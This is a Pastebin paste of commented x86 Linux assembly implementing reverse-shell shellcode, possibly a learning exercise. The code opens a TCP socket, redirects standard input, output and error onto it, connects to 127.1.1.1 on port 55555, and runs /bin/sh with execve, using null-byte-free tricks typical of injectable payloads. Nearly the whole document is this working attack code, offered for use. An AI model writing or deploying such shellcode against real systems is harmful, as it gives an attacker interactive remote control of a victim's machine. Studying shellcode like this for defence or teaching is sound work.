API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Sep 16th, 2018
72
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Z80 Assembler 2.32 KB | None | 0 0
raw download clone embed print report
  1. global _start
  2.  
  3. section .text
  4.  
  5. _start:
  6.  
  7.     ; host
  8.     push 0x0101017f     ; IP Number "127.1.1.1" in hex reverse order
  9.     pop esi
  10.  
  11.     ; port
  12.     push WORD 0x03d9    ; Port Number 55555 in hex reverse order
  13.     pop edi
  14.  
  15.    
  16.         ; syscalls (/usr/include/asm/unistd_32.h)
  17.         ; socketcall numbers (/usr/include/linux/net.h)
  18.  
  19.         ; Creating the socket file descriptor
  20.         ; int socket(int domain, int type, int protocol);
  21.         ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
  22.  
  23.     push 102
  24.     pop eax         ; syscall 102 - socketcall
  25.     cdq
  26.  
  27.     push 1
  28.     pop ebx         ; socketcall type (sys_socket 1)
  29.  
  30.     push edx        ; IPPROTO_IP = 0 (int)
  31.     push ebx        ; SOCK_STREAM = 1 (int)
  32.     push 2          ; AF_INET = 2 (int)
  33.  
  34. finalint:
  35.  
  36.     mov ecx, esp        ; ptr to argument array
  37.     int 0x80        ; kernel interruption
  38.  
  39.     xchg ebx, eax       ; set ebx with the sockfd
  40.  
  41.    
  42.     ; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
  43.     ; int dup2(int oldfd, int newfd);
  44.     ; dup2 (clientfd, ...)
  45.  
  46.     pop ecx
  47.  
  48. dup_loop:
  49.         mov al, 63      ; syscall 63 - dup2
  50.         int 0x80
  51.  
  52.         dec ecx
  53.         jns dup_loop
  54.  
  55.  
  56.     ; Connecting the duplicated file descriptor to the host
  57.     ; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
  58.     ; connect(sockfd, [AF_INET, 55555, 127.1.1.1], 16)
  59.  
  60.     mov al, 102     ; syscall 102 - socketcall
  61.                 ; socketcall type (sys_connect) 3 - ebx already has it
  62.  
  63.     ; host address structure
  64.     push esi        ; IP number
  65.     push di         ; port in byte reverse order = 55555 (uint16_t)
  66.     push WORD 2     ; AF_INET = 2 (unsigned short int)
  67.     mov ecx, esp        ; struct pointer
  68.  
  69.     ; connect arguments
  70.     push 16         ; sockaddr struct size = sizeof(struct sockaddr) = 16 (socklen_t)
  71.     push ecx        ; sockaddr_in struct pointer (struct sockaddr *)
  72.     push ebx        ; socket fd (int)
  73.  
  74.     mov ecx, esp
  75.  
  76.     int 0x80
  77.  
  78.         ; Finally, using execve to substitute the actual process with /bin/sh
  79.         ; int execve(const char *filename, char *const argv[], char *const envp[]);
  80.         ; exevcve("/bin/sh", NULL, NULL)
  81.  
  82.         mov al, 11      ; execve syscall
  83.  
  84.     ; execve string argument
  85.         push edx        ; null-byte
  86.         push 0x68732f2f     ; "//sh"
  87.         push 0x6e69622f     ; "/bin"
  88.  
  89.         mov ebx, esp        ; ptr to ["bin//sh", NULL] string
  90.         push edx        ; null ptr to argv
  91.         push ebx        ; null ptr to envp
  92.  
  93.     jmp finalint        ; and jump to bingo
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!